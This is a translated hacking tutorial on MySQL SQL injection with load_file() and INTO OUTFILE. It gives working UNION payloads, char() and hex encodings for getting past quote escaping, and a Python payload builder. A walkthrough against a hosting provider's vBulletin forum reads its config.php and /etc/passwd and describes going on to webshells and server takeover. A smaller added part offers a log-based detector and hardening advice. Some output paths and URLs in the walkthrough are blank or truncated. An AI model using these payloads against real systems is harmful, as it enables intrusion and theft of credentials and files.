SoFunction
Updated on 2025-04-11

Advanced SQL injection with MySQL

Text/Photo: Security Angel angel[BST]  Reprinted from http:// Author: angel
Preface
My "SQL Injection with MySQL" (a special topic in the July issue of "Hacker Defense") already gave a fairly comprehensive introduction to MySQL injection, but there is one quite harmful function that I did not mention in it, because if that function is applied flexibly, the security of PHP and even of the server is greatly reduced. Since "SQL Injection with MySQL" was published during the summer vacation, and considering that many novices, students and people of bad character would misuse it, I left it out of that article. In fact, this article was finished in early May. After the special topic was published, many people turned to research on PHP+MySQL injection; many new techniques will be explored one after another, and the advanced skills we have mastered in this area will be published one after another. As for the more basic material, this article will not repeat it.
Details
We know that various built-in functions can be used inside SQL statements. The ones used most often are DATABASE(), USER(), SYSTEM_USER(), SESSION_USER() and CURRENT_USER(), which return some system information. There is another function with much wider uses: load_file(). It reads a file and returns its contents as a string.
Having seen this, you should already be thinking of what we can do with it: read confidential files. But there are conditions:
The file must be on the host where the MySQL server runs.
The complete (absolute) path of the file must be given.
The MySQL account needs the FILE privilege, and the file must be readable, every byte of it, by the OS user that mysqld runs as.
The file must be smaller than max_allowed_packet.
If the file does not exist, or cannot be read for any of the reasons above, the function returns NULL, which most PHP programs print as an empty string. The hardest condition to satisfy is permissions. On Windows, if NTFS permissions are set properly, the files of interest cannot be read; when a file is readable only by administrators, do not expect load_file() to read it unless mysqld itself runs with those rights. Newer MySQL versions add a further limit, secure_file_priv, which confines both load_file() and INTO OUTFILE to a single directory or, when set to NULL, disables them entirely.
In an actual injection we have two difficulties to solve:
The absolute physical path of the target file.
Constructing an effective, deformed statement that survives the program's filtering.
In many PHP programs, submitting a query that causes an error will, if display_errors = on, expose the absolute path of the web directory in the error message. Once the path is known, any PHP program that can be injected becomes a serious threat to the security of the whole server; constructing the statement is then only a small matter.
Usage
Let's assume that the SQL statement of a program is as follows:
SELECT * FROM article WHERE articleid=$id

Note: current conditions: magic_quotes_gpc = off, c:/boot.ini readable.
Now we construct $id as:
-1 union select 1,1,1,1,load_file('c:/boot.ini')

Our query becomes:
SELECT * FROM article WHERE articleid=-1 union select 1,1,1,1,load_file('c:/boot.ini')

The program will obediently display the contents of c:/boot.ini (the number of 1s must match the number of columns in the article table, otherwise MySQL rejects the UNION). But hosts with magic_quotes_gpc = off are rare now: the quotes get escaped and the string literal breaks. How do we build the statement without quotes? Anyone who has read "SQL Injection with MySQL" will know: use the char() function, or convert the characters to hexadecimal. Yes, those are the two ways.
Note: current conditions: magic_quotes_gpc = on, c:/boot.ini readable.
We construct $id as:
-1 union select 1,1,1,1,load_file(char(99,58,47,98,111,111,116,46,105,110,105))

"char(99,58,47,98,111,111,116,46,105,110,105)" is "c:/boot.ini" written as ASCII codes, and our query becomes:
SELECT * FROM article WHERE articleid=-1 union select 1,1,1,1,load_file(char(99,58,47,98,111,111,116,46,105,110,105))

The file is read just as successfully. The string can also be converted to hexadecimal: "c:/boot.ini" in hex is "0x633a2f626f6f742e696e69", so the statement above can also be written as:
SELECT * FROM article WHERE articleid=-1 union select 1,1,1,1,load_file(0x633a2f626f6f742e696e69)

This form is shorter; which one to use is a matter of preference. You can run the following query in phpMyAdmin or at the mysql> prompt to study it at leisure, substituting an absolute path for [string]:
SELECT load_file([string])

Of course, in real applications the file content may not be displayed because of various restrictions (the column is not echoed, the page truncates it, and so on). In that case we can also use INTO OUTFILE to export the file to somewhere we can fetch it. Everyone already knows how to use it, so I will not repeat the details; an example will explain everything.
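As an added example (not code from the original article, nor from any forum software), the following Python builds the quote-free load_file() and INTO OUTFILE payloads described in this section. The column count, the position of the displayed column and the output filename /home/4ngel/soft/out.txt are assumptions about the target; the two encoders reproduce the char() and hex forms shown above.

```python
# Added example (not code from the original article): building the quote-free
# load_file() payloads described in the article. The column count, the position
# of the displayed column and the outfile name are assumptions about the target;
# the article's "SELECT * FROM article WHERE articleid=$id" is only a model.
from typing import Optional


def mysql_char_literal(s: str) -> str:
    """Encode s as CHAR(...) with decimal byte values: 'c:/' -> 'char(99,58,47)'."""
    return "char(" + ",".join(str(b) for b in s.encode("utf-8")) + ")"


def mysql_hex_literal(s: str) -> str:
    """Encode s as a hexadecimal literal: 'c:/' -> '0x633a2f'."""
    return "0x" + s.encode("utf-8").hex()


def build_load_file_payload(columns: int, position: int, path: str,
                            encoding: str = "hex",
                            outfile: Optional[str] = None) -> str:
    """Value to substitute for the numeric parameter (the article's $id).

    columns  -- number of columns the original SELECT returns; until this matches,
                MySQL rejects the UNION with a "different number of columns" error
    position -- 1-based index of the column the page actually displays
    path     -- absolute path on the MySQL server host to read
    encoding -- "hex" or "char"; both avoid quote characters entirely
    outfile  -- if given, append INTO OUTFILE so the content is written to disk
                instead of (or as well as) being displayed
    """
    if not 1 <= position <= columns:
        raise ValueError("position must be between 1 and columns")
    if encoding not in ("hex", "char"):
        raise ValueError("encoding must be 'hex' or 'char'")
    encode = mysql_hex_literal if encoding == "hex" else mysql_char_literal
    cols = ["1"] * columns
    cols[position - 1] = f"load_file({encode(path)})"
    # -1 (a row id that does not exist) keeps the original row out of the result
    payload = "-1 union select " + ",".join(cols)
    if outfile is not None:
        # INTO OUTFILE takes only a plain quoted string, so its quotes cannot be
        # encoded away: this form needs the quote to reach MySQL unescaped
        payload += f" into outfile '{outfile}'"
    return payload


if __name__ == "__main__":
    print(build_load_file_payload(5, 5, "c:/boot.ini"))
    print(build_load_file_payload(5, 5, "c:/boot.ini", encoding="char"))
    print(build_load_file_payload(6, 6, "/etc/passwd", encoding="char",
                                  outfile="/home/4ngel/soft/out.txt"))
```

The hex form is usually preferred because it is shorter and contains no commas or parentheses that a naive filter might reject; the INTO OUTFILE variant is the one case where a real quote character is unavoidable.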
Example
www.*** is a well-known FreeBSD hosting provider in my country. I used it for testing because its forum runs a vulnerable version of the VBB forum, so I did not need to look for vulnerable sites elsewhere (although they are everywhere). This was a complete security test: I only collected information and did not enter the server.
Here is a little more explanation of a piece of code in the root directory of VBB:
// get rid of slashes in get / post / cookie data
function stripslashesarray (&$arr) {
    while (list($key,$val)=each($arr)) {
        if ($key!="templatesused" and $key!="argc" and $key!="argv") {
            if (is_string($val) AND (strtoupper($key)!=$key OR ("".intval($key)=="$key"))) {
                // every lowercase or numeric key is run through stripslashes():
                // the backslashes magic_quotes_gpc added in front of quotes are removed again
                $arr["$key"] = stripslashes($val);
            } else if (is_array($val) AND ($key == 'HTTP_POST_VARS' OR $key == 'HTTP_GET_VARS' OR strtoupper($key)!=$key)) {
                // recurse into the GET/POST arrays and any other lowercase-keyed array
                $arr["$key"] = stripslashesarray($val);
            }
        }
    }
    return $arr;
}

if (get_magic_quotes_gpc() and is_array($GLOBALS)) {
    if (isset($attachment)) {
        $GLOBALS['attachment'] = addslashes($GLOBALS['attachment']);
    }
    if (isset($avatarfile)) {
        $GLOBALS['avatarfile'] = addslashes($GLOBALS['avatarfile']);
    }
    // undo magic_quotes_gpc for all request data at once
    $GLOBALS = stripslashesarray($GLOBALS);
}
set_magic_quotes_runtime(0);


The purpose of this code is to strip the backslash that magic_quotes_gpc puts in front of every special character, if magic_quotes_gpc is on. So whatever the state of magic_quotes_gpc, the single quotes we submit reach the database unescaped wherever the program does not escape them again itself, and we can inject with confidence. Hehe.
As we know, submitting:
/?action=edit&eventid=1 UNION SELECT 1,1,1,1,username,password FROM user WHERE userid=1

makes it possible to obtain the username and the MD5 hash of the password, but for special reasons it was not displayed. However, from experience we know that the construction contains no error, so we can read the data and export it to a file instead.
Because I had accidentally come across a file containing phpinfo() beforehand, I knew the absolute path of the web directory. From browsing the site I found that a download system generates HTML files; if that directory were not writable it could not generate them. None of this is the focus of this article, though. We now have the following information:
WEB absolute path: /home/4ngel
Writable directory path: /home/4ngel/soft/
magic_quotes_gpc = on 
Compared with root on the host, the forum admin is nothing, and I am not interested in the forum admin. We want to read the configuration file of the forum and /etc/passwd. Knowing the MySQL connection details, we can start from there and write a webshell or other things. Knowing /etc/passwd, we can crack the passwords and go straight in over ssh (on FreeBSD the password hashes actually live in /etc/master.passwd, which only root can read; /etc/passwd still gives the account names and shells).
The VBB forum's configuration file, /home/4ngel/forum/admin/config.php, is converted to ASCII codes and submitted as:
?action=edit&eventid=1 UNION SELECT 1,1,1,1,1,load_file(char(47,104,111,109,101,47,52,110,103,101,108,47,102,111,114,117,109,47,97,100,109,105,110,47,99,111,110,102,105,103,46,112,104,112)) FROM user WHERE userid=1 into outfile '/home/4ngel/soft/'

Haha, remember the WHERE condition: the injected SELECT produces one row per row of the user table, so on a forum with many users the exported file becomes quite large. Giving $eventid a non-existent value such as -1 keeps the original event row out of the file, but it does not reduce the number of load_file() rows; if you drop the WHERE as below, add LIMIT 1 before the INTO OUTFILE on a large forum:
?action=edit&eventid=-1 UNION SELECT 1,1,1,1,1,load_file(char(47,104,111,109,101,47,52,110,103,101,108,47,102,111,114,117,109,47,97,100,109,105,110,47,99,111,110,102,105,103,46,112,104,112)) FROM user into outfile '/home/4ngel/soft/'

Convert /etc/passwd to ASCII codes and submit:
?action=edit&eventid=-1 UNION SELECT 1,1,1,1,1,load_file(char(47,101,116,99,47,112,97,115,115,119,100)) FROM user into outfile '/home/4ngel/soft/'

Note that if the following error message appears at the top of the forum page:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/4ngel/forum/admin/db_mysql.php on line 154

experience tells us that the export succeeded: a SELECT ... INTO OUTFILE returns no result set, so the program's mysql_fetch_array() has nothing to fetch from. Now request:
/soft/
/soft/

The contents came out. When Dark Night and Pig Egg later broke into Grey, it was the same sequence: the passwords were shown one by one, cracked, the admin backend logged into, a backdoor uploaded, files read, and so on. All of it done with a single load_file(). Is that harmful enough? As shown in the picture:


I remember that in a group everyone was discussing the 9****.net site, and those who had got into the Black and White server had no way to go at Black and White directly, so they had to take a detour: use the load_file() function to learn some information, and then enter the server Black and White is located on. The process is the same as above: use the vulnerability to load_file() the program's configuration file directly, learn the MySQL details, connect remotely, write the database export files, and obtaining the server admin is easy.
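Turning the same material to the defender's side, here is an added Python example (not part of the original article) that scans web server access-log lines for load_file() and INTO OUTFILE in request URLs and decodes the char()/hex literals back into the path being targeted, covering both the forum walkthrough above and the configuration-file case described here. The log lines, client addresses, timestamps and the output filename are constructed for the example.

```python
# Added example (not from the original article): spotting load_file()/INTO OUTFILE
# injection attempts in web server access logs and decoding the char()/hex
# literals back into the file path being targeted. The log lines below are
# constructed for this example; addresses, timestamps and the outfile name are
# assumptions.
import re
from typing import Dict, List, Optional
from urllib.parse import unquote_plus

# string literals in the three forms the article uses: char(...), 0x..., '...'
LITERAL = r"(char\(\s*[0-9,\s]+\)|0x[0-9a-fA-F]+|'[^']*')"
LOAD_FILE_RE = re.compile(r"load_file\s*\(\s*" + LITERAL + r"\s*\)", re.I)
OUTFILE_RE = re.compile(r"into\s+(?:out|dump)file\s+'([^']*)'", re.I)
CHAR_RE = re.compile(r"char\(\s*([0-9,\s]+)\)", re.I)
HEX_RE = re.compile(r"0x([0-9a-fA-F]+)")
# 'src - - [time] "METHOD target ...': enough of the common/combined log format
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(?:GET|POST) (\S+)')


def decode_mysql_string(literal: str) -> Optional[str]:
    """Decode a char(...), 0x... or '...' literal to text; None if unrecognised."""
    lit = literal.strip()
    m = CHAR_RE.fullmatch(lit)
    if m:
        codes = [int(x) for x in m.group(1).split(",") if x.strip()]
        if any(not 0 <= c <= 255 for c in codes):
            return None
        return bytes(codes).decode("utf-8", "replace")
    m = HEX_RE.fullmatch(lit)
    if m and len(m.group(1)) % 2 == 0:
        return bytes.fromhex(m.group(1)).decode("utf-8", "replace")
    if len(lit) >= 2 and lit[0] == lit[-1] == "'":
        return lit[1:-1]
    return None


def analyze_request(target: str) -> Optional[Dict[str, Optional[str]]]:
    """Return {"read": path, "write": path} for a request using load_file() or
    INTO OUTFILE (a path is None when absent or undecodable); None otherwise."""
    decoded = unquote_plus(target)  # turn %20 etc. back into what MySQL saw
    m = LOAD_FILE_RE.search(decoded)
    hit = bool(m)
    read = decode_mysql_string(m.group(1)) if m else None
    m = OUTFILE_RE.search(decoded)
    hit = hit or bool(m)
    write = m.group(1) if m else None
    return {"read": read, "write": write} if hit else None


def scan_log(lines: List[str]) -> List[Dict[str, Optional[str]]]:
    """Run analyze_request over access-log lines and collect the hits."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        src, when, target = m.groups()
        finding = analyze_request(target)
        if finding:
            hits.append({"src": src, "time": when, **finding})
    return hits


# constructed sample log: one normal request, then the two payload shapes
# from the article (char()-encoded path plus INTO OUTFILE, and a hex path)
SAMPLE_LOG = """\
10.0.0.5 - - [11/Jul/2004:10:00:01 +0800] "GET /?action=edit&eventid=1 HTTP/1.0" 200 5120
10.0.0.5 - - [11/Jul/2004:10:00:09 +0800] "GET /?action=edit&eventid=-1%20UNION%20SELECT%201,1,1,1,1,load_file(char(47,101,116,99,47,112,97,115,115,119,100))%20FROM%20user%20into%20outfile%20'/home/4ngel/soft/out.txt' HTTP/1.0" 200 122
10.0.0.7 - - [11/Jul/2004:10:01:00 +0800] "GET /article.php?id=-1%20union%20select%201,1,1,1,load_file(0x633a2f626f6f742e696e69) HTTP/1.0" 200 7710
"""

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG.splitlines()):
        print(hit)
```

The decoder is what makes the alert useful: a raw char() list tells an analyst nothing, while "/etc/passwd" or a config.php path tells them immediately which secrets to assume are compromised. On the database side, the corresponding hardening is to revoke the FILE privilege from the web application's MySQL account and set secure_file_priv, so that even a successful injection cannot reach the filesystem.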
Postscript
Because the harm is so great, I never dared to publish this. I believe some people in China know about it; it just has not been made public. After repeated consideration, I decided to publish it. I hope that once you have mastered it, you will not carry out any destructive operations on domestic sites. Thanks for your cooperation!